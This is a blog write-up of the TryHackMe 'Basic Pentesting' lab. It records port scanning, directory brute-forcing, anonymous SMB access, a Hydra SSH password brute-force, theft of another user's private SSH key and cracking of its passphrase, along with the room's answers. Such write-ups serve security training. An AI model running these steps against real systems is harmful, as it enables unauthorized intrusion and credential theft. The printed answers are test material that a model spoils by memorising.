Home front-page port 80-shoopyu Basic Pentesting | TryHackMe Easy
Post
Cancel

front-page port 80-shoopyu Basic Pentesting | TryHackMe Easy

Setting-up

Task 1: Deploy the machine and connect to our network

Task 2: Deploy the machine and connect to our network

Reconnaissance

1
sudo nmap -sV -sC -O <ip-addr> 

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:12 EST
Nmap scan report for 10.10.66.136
Host is up (0.31s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
|   256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_  256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time: 
|   date: 2022-12-08T07:13:00
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2022-12-08T02:12:59-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.99 seconds

1
2
3
4
5
6
7
8
  Port       service   version   

  22/tcp     ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu 2.4
  80/tcp     http      Apache/2.4.18 (Ubuntu)  
  139/tcp    netbios   Samba smbd 3.X - 4.X
  445/tcp    netbios   Samba smbd 4.3.11-ubuntu
  8009/tcp   ajp13     Apache Jserv   
  8080/tcp   http      Apache Tomcat/9.0.7

Directory bruteforcing

To find out hidden directory we need to perform directory bruteforcing by using tools such as gobuster , dirbuster etc In this case we are using gobuster!

1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target-ip>
  • -w wordlists to a common directories
  • -u Target url
  • dir Directory bruteforce mode

Results :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.66.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                   
[+] Negative Status codes:   404                      
[+] User Agent:              gobuster/3.3             
[+] Timeout:                 10s                      
===============================================================                                             
2022/12/08 02:02:32 Starting gobuster in directory enumeration mode                                         
===============================================================                                             
/development          (Status: 301) [Size: 318] [--> http://10.10.66.136/development/]                      
Progress: 4760 / 220561 (2.16%)^C
[!] Keyboard interrupt detected, terminating.         
===============================================================                                             
2022/12/08 02:05:01 Finished                          
===============================================================

Task 3: What is the name of the hidden directory on the web server(enter name without /)?

1
development

visit /development

gobuster-http-disp

Let’s check the content of the both!

dev.txt

dev-txt

j.txt

j-text

As we guessed earlier, here are the dev notes. Apparently, the webserver users’ usernames start with β€œj” and β€œk”. We can definitely use this information in the future. In addition, Mr. K said that the β€œSMB has been configured.” which was proved by the Nmap scan

SMB Enumeration

1

ls-grep-smb-enum

1
2
  cd /usr/share/nmap/scripts
  nmap --script=smb-enum* <target-ip>

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
nmap --script=smb-enum* 10.10.66.136
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:39 EST
Nmap scan report for 10.10.66.136
Host is up (0.30s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.66.136\Anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.66.136\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
| smb-enum-sessions: 
|_  <nobody>
| smb-enum-domains: 
|   BASIC2
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|     Account lockout disabled
|   Builtin
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_    Account lockout disabled

Nmap done: 1 IP address (1 host up) scanned in 327.23 seconds

Β  Β  As we can clearly see, there are Anonymous and $IPC hidden shares. The $IPC share enables inter process communication as well as anonymous user login which requires no username or password. We can leverage this to our advantage by using the smbclient command and getting access to the anonymous share.

1
  smbclient //target-ip/anonymous

smbimage dir goes ihere

staff.txt might contain some useful information, so let’s get it into our computer with get staff.txt command.

1
  cat staff.txt
1
2
3
4
5
6
  Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

It seems we’ve found β€œk” and β€œj” users first showed up in the dev notes. As the SSH port is open and we know that Jan has a weak password from the Kay note (j.txt), let’s run hydra for cracking Jan’s password and getting inside the server.

Task 4: Use brute-forcing to find the username & password

Task 5: What is the username?

1
jan

SSH Bruteforcing

To brute force username and password Hydra is the best tool!

1
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target-ip>
  • -l username
  • -P password ``` β”Œβ”€β”€(rootγ‰Ώkali)-[/usr] └─# hydra -l jan -P share/wordlists/rockyou ssh://10.10.66.136 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-08 03:04:02 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.66.136:22/ [STATUS] 128.00 tries/min, 128 tries in 00:01h, 14344273 to do in 1867:45h, 14 active [STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active [STATUS] 94.00 tries/min, 658 tries in 00:07h, 14343743 to do in 2543:14h, 14 active [22][ssh] host: 10.10.66.136 login: jan password: armando ^C

1
2
3
4
5
6
7
> From this point we can login to the machine using **jan** and **armando** through ssh 

&nbsp;
&nbsp;

Task 6:   What is the password?

armando

1
Task 7:   What service do you use to access the server(answer in abbreviation in all caps)?

SSH

1
2
3
4
5
6
7
Task 8:   Enumerate the machine to find any vectors for privilege escalation

## Gaining access through SSH

```sh
ssh jan@<target-ip>

Type password as armando

we got access!!

Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
jan@basic2:~$ cd ../kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
jan@basic2:/home/kay$

Go to .ssh folder

1
cd .ssh

Here you can see all rsa keys for kay . So now the task is to get those keys onto our computer! which we can transfer using rsync or scp commands.

else just use cat id_rsa and copy and save that into your computer

1
ssh2john <id_rsa-file-you-copied.txt> >> hash.txt
1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Here you go we got a password!!!

1
2
3
4
5
6
7
8
9
10
11
rockyoun forjohn.txt --wordlist=/usr/share/wordlists/ 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (/home/local_host/id_rsa.txt)     
1g 0:00:00:00 DONE (2022-12-08 03:31) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Login to kay’s account now!

1
chmod 700 id_rsa.txt
1
ssh kay@<target-ip>

passphrase for key id_rsa.txt is beeswax

Mission Accomplished!!

Task 9: What is the name of the other user you found(all lower case)?

1
kay

Task 10: If you have found another user, what can you do with this information?

Task 11: What is the final password you obtain?

1
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
This post is licensed under CC BY 4.0 by the author.

front-page port 80-shoopyu Meow | HackTheBox Easy

front-page port 80-shoopyu Simple CTF| Tryhackme | Easy